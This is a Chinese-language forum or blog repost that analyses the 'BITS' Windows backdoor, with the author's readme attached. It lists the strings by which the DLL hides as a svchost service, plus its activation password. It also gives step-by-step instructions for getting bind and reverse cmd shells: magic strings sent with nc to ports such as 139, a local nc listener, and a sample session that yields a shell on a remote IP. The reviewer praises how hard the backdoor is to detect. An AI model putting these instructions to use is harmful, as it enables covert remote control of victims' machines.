| 关键词: 端口 dancewithdolphin BITS 主机 目标 监听 反向 Windows system Parameters |
先让我们来看看作者是怎样说的?特点:进程管理器中看不到平时没有端口,只是在系统中充当卧底的角色提供正向连接和反向连接两种功能仅适用于Windows2000/XP/2003一点一点来分析"%systemroot%\system32\qmgr.dll""%SystemRoot%\System32\svchost.exe "使用系统文件把自己注册成服务中所需的dll很聪明:)"@dancewithdolphin",这个好像是通用密码,没试过下面是实际操作里所需要的东西"[rxell]:"远程连接"[xell]:"连接上之后"\Parameters"相应目录"]_^[""BITS""cmd"命令行"Enter ServiceMain""Enter Sniffer"打开sniffer"GetModuleFileName() get dll path"安装之前的工作,找的安装所需的dll的目录"Install BITS OK."安装信息"IPRIP""netsvcs""OpenSCManager()""Parameters"这下面是删除这个东东的表现"Removed""ServiceDll"在注册表里将自己这测成开机自动启动及服务"RegCreateKey(Parameters)""RegQueryValueEx(Svchost\netsvcs)""RegSetValueEx(ServiceDll)""SOFTWARE\Microsoft\Windows NT\CurrentVersion\S""SOFTWARE\Microsoft\Windows NT\CurrentVersion\s""Start""Strings""SYSTEM\CurrentControlSet\Services\"这些都是作者的信息——可靠性我有点怀疑"www.netXeyes.com [email protected]""BackDoor BITS, by netXeyes 2003.09.15"点评:没有新意,但思路不错,代码严谨,不容易发现。希望下一版本里的自我保护能力增强!附:作者的readme.txt卸载:rundll32.exe BITS.dll,Uninstall重启系统通常情况下安装和卸载无论成功或者失败都不会有提示。正向连接:1、用nc连接目标主机的任何一个TCP端口(80/139/445.....)2、按照以下格式输入激活命令@dancewithdolphin[xell]:例如,在安装的时候设定了Active Strings为BITS Door,将CMD绑定在端口99:BITS Door@dancewithdolphin[xell]:99这样目标主机就会将CMD绑定在99。3、连接目标主机的指定端口(上例中为99)反向连接:很多情况下主机是在防火墙后面的,这样就需要用反向连接。1、在本地使用NC监听(如:nc -l -p 1234)2、用nc连接目标主机的任何一个防火墙允许的TCP端口(80/139/445.....)3、按照以下格式输入激活命令@dancewithdolphin[rxell]::例如,在安装的时候设定了Active Strings为BITS Door,本机地址为1.1.1.1, nc在1234端口监听:BITS Door@dancewithdolphin[rxell]:1.1.1.1:12344、目标主机的CMD将会出现在NC监听的端口1234。注意:所有的输入都区分大小写。Example:C:\My Documents>nc 219.237.63.199 139securitystrings@dancewithdolphin[xell]:7?C:\My Documents>nc 219.237.63.199 7廙icrosoft Windows 2000 [Version 5.00.2195](C) 版权所有 1985-2000 Microsoft Corp.C:\WINNT\system32>如果没有成功,可以尝试在安装的时候使用:rundll32.exe BITS.dll,Install rasauto |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|